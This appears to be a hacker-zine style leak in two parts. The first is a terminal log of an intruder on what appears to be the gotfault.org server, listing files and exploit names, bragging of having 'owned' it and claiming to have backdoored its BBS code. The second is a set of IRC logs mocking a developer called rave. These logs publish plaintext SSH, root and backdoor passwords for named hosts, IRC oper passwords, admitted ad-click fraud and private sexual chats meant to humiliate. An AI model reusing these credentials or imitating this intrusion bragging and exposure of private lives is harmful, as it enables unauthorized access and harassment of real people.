14:32 /home/publisher/ansi/bytecode.menu 14:32 /home/publisher/ansi/exploits.menu 14:32 /home/publisher/ansi/main.menu 14:32 /home/publisher/ansi/options.menu 14:32 /home/publisher/ansi/papers.menu 14:32 /home/publisher/ansi/snipplets.menu 14:32 /home/publisher/ansi/tools.menu 14:32 /home/publisher/ascii 14:32 /home/publisher/ascii/audits.menu 14:32 /home/publisher/ascii/bytecode.menu 14:32 /home/publisher/ascii/exploits.menu 14:32 /home/publisher/ascii/main.menu 14:32 /home/publisher/ascii/options.menu 14:32 /home/publisher/ascii/papers.menu 14:32 /home/publisher/ascii/snipplets.menu 14:32 /home/publisher/ascii/tools.menu 14:32 /home/publisher/bin 14:32 /home/publisher/bin/bbs_audits_a 14:32 /home/publisher/bin/bbs_audits_p 14:32 /home/publisher/bin/bbs_audits_s 14:32 /home/publisher/bin/bbs_bb_a 14:32 /home/publisher/bin/bbs_bb_p 14:32 /home/publisher/bin/bbs_bb_s 14:32 /home/publisher/bin/bbs_bytecode_a 14:32 /home/publisher/bin/bbs_bytecode_p 14:32 /home/publisher/bin/bbs_bytecode_s 14:32 /home/publisher/bin/bbs_chat 14:32 /home/publisher/bin/bbs_exploits_a 14:32 /home/publisher/bin/bbs_exploits_p 14:32 /home/publisher/bin/bbs_exploits_s 14:32 /home/publisher/bin/bbs_options_c 14:32 /home/publisher/bin/bbs_papers_a 14:32 /home/publisher/bin/bbs_papers_p 14:32 /home/publisher/bin/bbs_papers_s 14:32 /home/publisher/bin/bbs_snipplets_a 14:32 /home/publisher/bin/bbs_snipplets_p 14:32 /home/publisher/bin/bbs_snipplets_s 14:32 /home/publisher/bin/bbs_tools_a 14:32 /home/publisher/bin/bbs_tools_p 14:32 /home/publisher/bin/bbs_tools_s 14:32 /home/publisher/bin/bbs_whois 14:32 /home/publisher/database 14:32 /home/publisher/database/audits 14:32 /home/publisher/database/audits/serial 14:32 /home/publisher/database/blackboard 14:32 /home/publisher/database/blackboard/serial 14:32 /home/publisher/database/bytecode 14:32 /home/publisher/database/bytecode/serial 14:32 /home/publisher/database/exploits 14:32 /home/publisher/database/exploits/serial 14:32 /home/publisher/database/papers 14:32 /home/publisher/database/papers/serial 14:32 /home/publisher/database/snipplets 14:32 /home/publisher/database/snipplets/0 14:32 /home/publisher/database/snipplets/1 14:32 /home/publisher/database/snipplets/serial 14:32 /home/publisher/database/tools 14:32 /home/publisher/database/tools/serial 14:32 /home/publisher/publisher 14:32 /home/publisher/scripts 14:32 /home/publisher/scripts/audits.menu 14:32 /home/publisher/scripts/blackboard.menu 14:32 /home/publisher/scripts/bytecode.menu 14:32 /home/publisher/scripts/exploits.menu 14:32 /home/publisher/scripts/main.menu 14:32 /home/publisher/scripts/options.menu 14:32 /home/publisher/scripts/papers.menu 14:32 /home/publisher/scripts/snipplets.menu 14:32 /home/publisher/scripts/tools.menu 14:32 /home/phyro/eggdrop/scripts 14:32 /home/phyro/eggdrop/scripts/action.fix.tcl 14:32 /home/phyro/eggdrop/scripts/alltools.tcl 14:32 /home/phyro/eggdrop/scripts/autobotchk 14:32 /home/phyro/eggdrop/scripts/botchk 14:32 /home/phyro/eggdrop/scripts/cmd_resolve.tcl 14:32 /home/phyro/eggdrop/scripts/compat.tcl 14:32 /home/phyro/eggdrop/scripts/CONTENTS 14:32 /home/phyro/eggdrop/scripts/getops.tcl 14:32 /home/phyro/eggdrop/scripts/klined.tcl 14:32 /home/phyro/eggdrop/scripts/notes2.tcl 14:32 /home/phyro/eggdrop/scripts/ques5.tcl 14:32 /home/phyro/eggdrop/scripts/sentinel.tcl 14:32 /home/phyro/eggdrop/scripts/userinfo.tcl 14:32 /home/phyro/eggdrop/scripts/weed 14:32 /home/phyro/installed/phyro/scripts 14:32 /home/phyro/installed/phyro/scripts/action.fix.tcl 14:32 /home/phyro/installed/phyro/scripts/alltools.tcl 14:32 /home/phyro/installed/phyro/scripts/autobotchk 14:32 /home/phyro/installed/phyro/scripts/botchk 14:32 /home/phyro/installed/phyro/scripts/cmd_resolve.tcl 14:32 /home/phyro/installed/phyro/scripts/compat.tcl 14:32 /home/phyro/installed/phyro/scripts/CONTENTS 14:32 /home/phyro/installed/phyro/scripts/getops.tcl 14:32 /home/phyro/installed/phyro/scripts/help 14:32 /home/phyro/installed/phyro/scripts/help/cmd_resolve.help 14:32 /home/phyro/installed/phyro/scripts/help/msg 14:32 /home/phyro/installed/phyro/scripts/help/msg/userinfo.help 14:32 /home/phyro/installed/phyro/scripts/help/userinfo.help 14:32 /home/phyro/installed/phyro/scripts/klined.tcl 14:32 /home/phyro/installed/phyro/scripts/Makefile 14:32 /home/phyro/installed/phyro/scripts/Makefile.in 14:32 /home/phyro/installed/phyro/scripts/notes2.tcl 14:32 /home/phyro/installed/phyro/scripts/ques5.tcl 14:32 /home/phyro/installed/phyro/scripts/sentinel.tcl 14:32 /home/phyro/installed/phyro/scripts/userinfo.tcl 14:32 /home/phyro/installed/phyro/scripts/weed 14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts 14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts/ptal-cups.in 14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts/ptal-init.in 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/compile 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.guess 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.rpath 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.sub 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/depcomp 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/elisp-comp 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/generr.awk 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-doc-snarf 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-func-name-check 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-snarf.awk 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile.am 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile.in 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/guile-doc-snarf 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/guile-doc-snarf.awk 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile.am 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile.in 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/install-sh 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/ltmain.sh 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mailutils.spec 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mailutils.spec.in 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile.am 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile.in 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mdate-sh 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/missing 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mkinstalldirs 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/sqlmod.sh 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/texify.sed 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/texinfo.tex 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/ylwrap 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/address.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_all.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_domain.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_local.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_matches.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof00.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof01.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof11.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof00.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof01.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof11.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/discard.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/DISTFILES 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/envelope1.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists1.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists2.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists3.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/false.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/fileinto.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header-mime.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header1.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header2.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header3.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-contains.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-is.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-matches.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-regex.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-numeric-contains.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-numeric-is.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-contains.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-is.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-matches.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-regex.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/keep.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/mul-addr.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/not.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/null.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/numaddr.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/redirect.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/reject.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-address.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-hairy.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-header.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/size1.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/size2.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/stop.sv 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/true.sv 14:32 /home/posidron/dump/scripts 14:32 /home/posidron/dump/scripts/audit_log 14:32 /home/posidron/dump/scripts/canoo.sh 14:32 /home/posidron/dump/scripts/debug.c 14:32 /home/publisher/scripts 14:32 /home/publisher/scripts/audits.menu 14:32 /home/publisher/scripts/blackboard.menu 14:32 /home/publisher/scripts/bytecode.menu 14:32 /home/publisher/scripts/exploits.menu 14:32 /home/publisher/scripts/main.menu 14:32 /home/publisher/scripts/options.menu 14:32 /home/publisher/scripts/papers.menu 14:32 /home/publisher/scripts/snipplets.menu 14:32 /home/publisher/scripts/tools.menu 14:32 /home/sirphreak/0x80/x80/scripts 14:32 /home/sirphreak/0x80/x80/scripts/action.fix.tcl 14:32 /home/sirphreak/0x80/x80/scripts/alltools.tcl 14:32 /home/sirphreak/0x80/ 14:32 -!- Irssi: process 0 (locate * |grep home) terminated with return code 0 4lL th1z 1s 0K bu7 3yez w4ntz 0hd4yz!!! [14:33]/exec locate exploit|grep -v home 14:33 /root/temp/trapdown/include/exploits.h 14:33 /root/temp/trapdown/include/info_exploits.h 14:33 /root/temp/trapdown/include/show_exploits.h 14:33 /root/temp/trapdown/src/info_exploits.c 14:33 /root/temp/trapdown/src/show_exploits.c 14:33 /var/www/gotfault.org/exploits 14:33 /var/www/gotfault.org/exploits/gotfault-lcdproc.c 14:33 /var/www/gotfault.org/exploits/gotfault-psoproxy.c 14:33 /var/www/nutshell.gotfault.org/exploits 14:33 /var/www/nutshell.gotfault.org/exploits/flow-as.pl 14:33 /var/www/nutshell.gotfault.org/exploits/flow-bar.pl 14:33 /var/www/nutshell.gotfault.org/exploits/flow-compress.pl 14:33 /var/www/nutshell.gotfault.org/exploits/flow-kon.pl < W3'V3 0WN3D M4NY B0X3Z W1TH TH1Z, TH4NKZ 14:33 /var/www/nutshell.gotfault.org/exploits/flow-psoproxy.pl 14:33 /var/www/nutshell.gotfault.org/exploits/flow-sox-rh.pl 14:33 /var/www/nutshell.gotfault.org/exploits/flow-sox-slack.pl 14:33 /var/www/nutshell.gotfault.org/exploits/picasmpoc.pl 14:33 /var/www/nutshell.gotfault.org/exploits/picasmxpl.pl 14:33 /var/www/setnf.gotfault.org/exploits 14:33 /var/www/setnf.gotfault.org/exploits/gotfault-lcdproc.c 14:33 /var/www/setnf.gotfault.org/exploits/gotfault-pcwsd.c 14:33 /var/www/setnf.gotfault.org/exploits/gotfault-psoproxy.c < 0MGZ TH1Z IZ 0LD! 14:33 -!- Irssi: process 0 (locate exploit|grep -v home) terminated with return code 0 3yE f0uNdeD th3mz!!! /exec locate /root/ | head -n5 14:33 /root/.bashrc 14:33 /root/.bash_history 14:33 /root/.BitchX 14:33 /root/.BitchX/BitchX.away 14:33 /root/.BitchX/screens 14:36 -!- Irssi: process 0 (locate /root/| head -n5) terminated with return code 0 3yE R S331ng 4z r00t, h4r h4r h4r!!@! /exec w 14:44 14:44:50 up 5 days, 2:53, 6 users, load average: 0.06, 0.08, 0.10 14:44 USER TTY LOGIN@ IDLE JCPU PCPU WHAT 14:44 posidron pts/6 02:45 10:26 1.49s 0.00s nano samiftpd.pl < N3W 0D4Y 1N TH3 W0RKZ!! 14:44 publishe pts/20 13:47 39.00s 2.63s 0.01s /bin/sh /home/publisher/scripts 14:44 publishe pts/23 14:28 0.00s 11.91s 0.01s /bin/sh /home/publisher/scripts 14:44 publishe pts/24 14:02 32:22 13.10s 0.01s /bin/sh /home/publisher/scripts 14:44 setnf pts/25 14:14 7:02 1.04s 1.03s irssi 14:44 setnf pts/26 14:24 13:27 0.11s 0.01s sshd: setnf [priv] 14:44 -!- Irssi: process 0 (w) terminated with return code 0 /exec echo 'h0h0h0 0wn3d 4g4iN!!' 14:46 h0h0h0 0wn3d 4g4iN!! 14:46 -!- Irssi: process 0 (echo 'h0h0h0 0wn3d 4g4iN!!') terminated with return code 0 /quit 14:46 -!- Irssi: Disconnecting from server localhost: [leaving] 14:46 -!- Irssi: Connection lost to localhost [] [1] B +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ | | | ________ __ _____ .__ __ | | / _____/ _____/ |__/ ____\____ __ __| |_/ | | | / \ ___ / _ \ __\ __\\__ \ | | \ |\ __\ | | \ \_\ ( <_> ) | | | / __ \| | / |_| | | | \______ /\____/|__| | | (____ /____/|____/__| | | \/ | | \/ | | | | | | udits | | chat| | oolbox | | lackboard| |

apers | | ptions| | xploits | | ho's Online | | nipplets |__| ogout | | | +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ gotfault> L /* wh3nZ 3yEz c0nn3c73d l4t3rZ th3y 5p0tt3d m3 4nd k1lled M3ye 5ess1on wh1l3z 1 wUz b4ckd00r1nG 7h3ir BBS c0d3 :((( */ 08.txt -~-~-~ N3V3R 0WN3D! h0no h4z c0mp1l3d a s3r13z 0f 1rc l0gz pr0f1l1ng th3 s3lf 1d3nt1f13d "cr34t0r 0f th3 w0rldz m0zt s3cur3 ftpd". th3 r4v3 vs jedi/sector one b4ttl3 1z h34t1ng up.. w4tch 0ut jedi/sector one, h0no muzt s33 1f r4v3'z cl41mz h0ldz tru3 (t4k3 th1z 4z a thr34t). -~-~-~ NEVER HACKED Sep 03 22:41:58 rave i wasnt hacked by security Sep 03 22:42:11 rave i was in contact with the once who hacked me Sep 03 22:42:28 rave hold ur self now Sep 03 22:42:33 rave they rooted humpmeg Sep 03 22:42:51 rave and then acted like the_mytstic Sep 03 22:43:02 rave and when i requested for help Sep 03 22:43:07 rave it was the hacker Sep 03 22:43:15 rave and so they gained my root password Sep 03 22:43:27 rave they had root for 3 months already Sep 03 22:43:28 mite damn that sucks. Sep 03 22:43:49 rave yes Sep 03 22:43:58 rave because my security got blamed Sep 03 22:44:07 rave and thats prob why you delinked Sep 03 22:44:14 mite yes it was Sep 03 22:44:19 rave i was never hacked Sep 03 22:44:23 rave i mean realy hacked Sep 21 23:42:19 rave my software is only exploited once Sep 21 23:42:27 techie hehe Sep 21 23:42:33 rave and that wasnt even in a release Sep 21 23:42:36 rave so basicly Sep 21 23:42:44 rave vsftpd and me are on the same level Sep 21 23:42:47 rave NEVER OWNED Sep 21 23:42:51 rave and hacked -~-~-~ GREAT IDEA... IDIOT Sep 16 01:20:13 rave okey Sep 16 01:20:23 rave i have this new thing on my daemon Sep 16 01:20:24 Strokerace ok, what Sep 16 01:20:31 rave tell me what you think Sep 16 01:20:50 rave if the credit in payal is 200+ we pay hackers for there hacks Sep 16 01:21:11 rave and in the mean while they have to tell others to donate to my project so they can urn money Sep 16 01:21:15 rave while they hack it Sep 16 01:21:29 rave i payed dreamcatcher already Sep 16 01:21:31 Strokerace hmm Sep 16 01:21:36 rave what do you think Sep 16 01:22:01 rave its a clever piramit game dont you think ?? Sep 16 01:22:43 rave 200+ that enough to pay ur developers as well Sep 16 01:23:32 Strokerace yes, it does sound like a good idea Sep 16 01:23:46 rave you should do it for edge as well Sep 16 01:23:46 Strokerace as long as there is more money coming in then going out Sep 16 01:24:02 rave no not realy Sep 16 01:24:11 rave because making money comes automaticly Sep 16 01:24:17 rave the hackers want money Sep 16 01:24:25 rave so they ask everyone to donate Sep 16 01:24:32 rave so it comes automaticly Sep 16 01:24:51 Strokerace yes, that is true Sep 16 01:25:04 rave its a piramid game Sep 16 01:25:14 rave use it for edge !! Sep 16 01:25:24 rave gain money by donating Sep 16 01:25:29 Strokerace yes, but even the best thought out ones can fail Sep 16 01:25:31 rave thats ur slogan to use Sep 16 01:25:52 rave how do you see this fail ?? Sep 16 01:25:58 rave if al they hackers Sep 16 01:26:10 rave want to make money they all get some one to pay Sep 16 01:26:23 rave so soon we will be @ 500++ Sep 16 01:26:35 Strokerace what if the money stops coming in Sep 16 01:26:38 rave and @ 200 we say Sep 16 01:26:44 rave sorry there is no more 200++ Sep 16 01:26:52 rave then we dont pay Sep 16 01:26:55 rave simple Sep 16 01:27:05 rave they want money ?? Sep 16 01:27:09 rave they can have it Sep 16 01:27:11 Strokerace as long as they all know Sep 16 01:27:23 rave i have tons of contacts Sep 16 01:27:47 rave i can advertice for free over more then 100+ very know security sites Sep 16 01:27:56 rave like i dont know if you know it Sep 16 01:28:00 rave packet storm Sep 16 01:28:01 rave and Sep 16 01:28:07 rave alstalavista Sep 16 01:28:12 rave and blacksun Sep 16 01:28:20 rave rosiello Sep 16 01:28:25 rave .org that is Sep 16 01:28:39 rave amd any NL lug group Sep 16 01:28:46 Strokerace hmm Sep 16 01:28:47 rave and in american Sep 16 01:28:55 rave and canada Sep 16 01:29:16 rave aldo we have a few chat members Sep 16 01:29:21 rave rosiello as it is Sep 16 01:29:25 rave is huge Sep 16 01:29:51 rave with all of our contact used @ once Sep 16 01:30:07 rave we could make edge bigger then phpnuke or postnuke -~-~-~ MORON Oct 18 22:04:37 rave can you click my adds again ? btw i google droped me because of abuse Oct 18 22:04:49 rave i lost all of my money i made Oct 18 22:04:54 rave $80++ Oct 18 22:20:47 link :| Oct 18 22:20:49 link abuse? Oct 18 22:21:55 link done Oct 18 22:33:46 rave ty Oct 18 22:33:51 rave yes i clicked my own adds :) -~-~-~ THE SCENE (wh4t 4b0ut dt0rz?!??) Sep 16 02:55:56 rave sorry to say kid now Sep 16 02:56:04 rave but you dont know my history Sep 16 02:56:08 rave rosiello Sep 16 02:56:13 rave blacksun Sep 16 02:56:18 rave packetstorm Sep 16 02:56:26 rave and phrack Sep 16 02:56:29 rave used to be 1 Sep 16 02:56:38 rave 1 underground crew -~-~-~ ALIAS H0NO`YOU`ARE`FUCKED /nick cold;/oper cold FDKMP-Q66H-3D26KY Oct 15 23:55:58 cold what did you put my pass as? Oct 15 23:56:28 rave FDKMP-Q66H-3D26KY Oct 15 23:56:39 rave user cold Oct 15 23:56:50 cold k Oct 15 23:57:01 cold so its /oper ? Sep 03 10:09:57 _Nemesis_ br0 Sep 03 10:10:00 _Nemesis_ =) Sep 03 10:10:37 _Nemesis_ use for my O-Line nick nemesis pass gabriel Sep 03 10:10:43 _Nemesis_ when u set it -~-~-~ Sep 04 11:12:10 angelo man Sep 04 11:12:16 angelo this a security thing Sep 04 11:12:16 rave yes ? Sep 04 11:12:17 angelo well Sep 04 11:12:24 angelo you are logging things Sep 04 11:12:27 angelo in the logs Sep 04 11:12:31 angelo isn't it? Sep 04 11:13:01 angelo now... suppose an hacker fuck the system and uses ftpd Sep 04 11:13:06 angelo or even hack the system by ftpd Sep 04 11:13:12 angelo are u following me? Sep 04 11:13:20 rave yes i get what you mean Sep 04 11:13:42 angelo now... LET ME GUESS. HE WILL READ THE LOGS AND LAUGH AT HOW DUMB YOU ARE. -~-~-~ PASSWORDS IN PLAIN TEXT. FUCKING BRILLIANT. Sep 18 00:39:33 rave can you check if ssh www.rosiello.net works now ? Sep 18 00:39:43 angelo ok Sep 18 00:39:47 rave i dont know if they are fake Sep 18 00:39:55 rave they just dont work on my box Sep 18 00:40:20 angelo it works Sep 18 00:40:25 angelo ssh Sep 18 00:40:48 rave rave:godiswithus Sep 18 00:41:05 rave dont steal my porn Sep 18 00:41:21 rave and dont packet filter my cyber sex adventures !! Sep 18 00:41:30 angelo I will add my self Sep 18 00:41:50 rave you cant you have no root Sep 18 00:42:00 rave you can only do it after you hacked it Sep 18 00:42:01 angelo oh Sep 18 00:42:14 angelo can't u add an user angelo? Sep 18 00:42:15 angelo add angelo Sep 18 00:42:19 angelo pass test123 Sep 18 00:42:21 angelo I will change the pwd Sep 18 00:42:28 rave ok hold on Sep 18 00:44:39 rave done ... Sep 20 22:55:54 baaah ssh tech.tnet.no -l root Sep 20 22:56:05 rave well i dont want to spoil you fun Sep 20 22:56:09 rave passwd ?? Sep 20 22:56:18 baaah backdoor password: vulnerable (WHATEVER YOU DO! DONT GIVE HIM THIS PASWORD!!! OR TELL HIM ABOUT IT) Sep 20 22:56:34 baaah real password: cerwinvegav10f Sep 20 22:56:37 baaah use the backdoor password Sep 20 22:56:41 baaah because then you dont get logged Sep 20 22:56:47 baaah and histfile is /dev/null Sep 20 22:56:48 baaah etc. Sep 20 22:56:57 baaah it wont appear in syslog either -~-~-~ H0NO IS ON THE SAME LEVEL AS RAVE. Sep 20 23:09:19 rave ppl with my knollage (sorry to drag i didnt mean to) can just walk in to boxes -~-~-~ AS THE SERVER TURNS... Sep 12 02:42:34 rave she knows the art Sep 12 02:42:41 rave the art as in Sep 12 02:42:50 rave not to gigle like a 16 year old girl Sep 12 02:42:59 rave but stay serieuse Sep 12 02:43:14 rave and expose litle parsts about her self Sep 12 02:43:24 rave and those are horney and she knows it Sep 12 02:43:35 rave thats why she lifts up her skirt Sep 12 02:43:50 rave by exident she claims Sep 12 02:44:08 qeed ah Sep 12 02:44:11 qeed nympho ;P Sep 12 02:44:17 qeed man im just labeling girls as sex toys today Sep 12 02:44:18 qeed how rude Sep 12 02:44:51 rave neeh she is realy sweet as well Sep 12 02:45:01 rave like as in realy sweet Sep 12 02:45:12 rave but she just know the game of saduction Sep 12 02:46:43 rave i think with these kind of girls Sep 12 02:46:56 rave you could stick even ur hear in her puss Sep 12 02:47:10 qeed nice girl you fetched down by the river Sep 12 02:47:20 rave and drown ur self !! Sep 12 02:47:24 rave lol Sep 12 02:47:27 qeed +D Sep 12 02:49:04 rave and so sweet Sep 12 02:49:37 rave and your sutch with the young girls who are even afraid to be fingered Sep 12 02:49:47 rave mine sayes isthat all ? Sep 12 02:49:55 rave fuck me now bastart Sep 12 02:50:02 rave make me kun !! har har !! ... Sep 15 16:36:36 styx ok heres my mobile number :D *********** ;) Sep 15 16:36:42 rave oooh Sep 15 16:36:53 styx not that we should phone eachother cause we have skype :D Sep 15 16:37:04 styx but we could send a few pics i guess :P Sep 15 16:37:05 rave +07 is UK ? Sep 15 16:37:14 rave sure Sep 15 16:37:16 styx hmm +44 i think Sep 15 16:37:20 styx lemme google Sep 15 16:37:24 rave ok Sep 15 16:39:11 styx yeah its +44 Sep 15 16:39:18 styx where do u live? Sep 15 16:39:54 rave i live close to den helder Sep 15 16:40:10 rave http://www.wieringen.nl/ Sep 15 16:40:50 rave +31 is my country number Sep 15 16:40:58 rave let me give you my number Sep 15 16:41:40 rave ********* Sep 15 16:41:50 rave complete that is Sep 15 16:41:57 rave +31********* ... Sep 17 22:18:48 rave i need a massage Sep 17 22:19:07 styx i'll give u massage :D Sep 17 22:19:23 rave mmmm i would like that sexy lady Sep 17 22:19:37 rave my lower back hurts of a the development Sep 17 22:22:49 * rave kisses styx in her neck Sep 17 22:27:13 styx i shouldnt have done that ... Sep 17 22:52:50 rave Rootx is all over you Sep 17 22:53:05 styx lol Sep 17 22:53:12 styx that cause i said i was f Sep 17 22:53:12 rave :| Sep 17 22:53:14 styx lol Sep 17 22:53:17 styx dont worry Sep 17 22:53:26 styx u got me, u got me good ;) Sep 17 22:53:39 rave good else i would be a but jelouse Sep 17 22:54:23 styx no need :D Sep 17 22:54:46 styx im cold, brb gonna put a jumper on Sep 17 22:54:56 rave awwww okey :) Sep 17 22:55:20 rave yes good idea im cold a well !!. brrr warm me up a bit Sep 17 22:57:27 styx ans so it is, just like u said it would be, we'll both forget the breeze, most of the time Sep 17 22:57:54 styx and so it is, the colder water, the blowers daughter, the pupil ended it all Sep 17 22:58:04 styx i cant take my eyes off of u Sep 17 22:58:07 styx i cant take my eyes off of u Sep 17 22:58:09 styx i cant take my eyes off of u Sep 17 22:58:19 styx and so it is Sep 17 22:58:34 styx oooooooooooo Sep 17 22:58:42 styx did i say i that i love u Sep 17 22:58:49 styx did i say that i want to Sep 17 22:58:54 styx leave it all behind? Sep 17 22:59:08 styx i cant take my mind off of u Sep 17 22:59:12 styx i cant take my mind off of u Sep 17 22:59:35 styx :D Sep 17 22:59:38 styx sorry Sep 17 22:59:40 styx lol Sep 17 22:59:50 rave these my lines for you Sep 17 22:59:55 rave *there where ... Sep 17 23:00:16 styx :| Sep 17 23:00:23 rave I cant keep my off of you and girl you know that im true ... Sep 17 23:01:15 rave you have verry twinklying eyes Sep 17 23:01:57 styx rave u are something special, u know that? :D Sep 17 23:02:05 rave i am ? Sep 17 23:02:12 styx very Sep 17 23:02:16 rave what makes me so special ? Sep 17 23:02:17 styx im serious Sep 17 23:02:23 styx just u Sep 17 23:02:27 styx nothing else Sep 17 23:02:33 styx thats the best thing Sep 17 23:02:37 rave :O :* Sep 17 23:02:45 styx u are :D Sep 17 23:02:52 styx thats cool Sep 17 23:02:56 rave thats realy sweet Sep 17 23:03:02 styx do me a favour Sep 17 23:03:06 rave no one ever told me i was special Sep 17 23:03:35 styx if we dont work out, and things dont happen (i hope they do) stay exactly as u are Sep 17 23:03:50 styx u shouldnt change for anyone Sep 17 23:03:52 styx :) Sep 17 23:04:15 rave awww girl thats so sweet it even brought a tear to my eye Sep 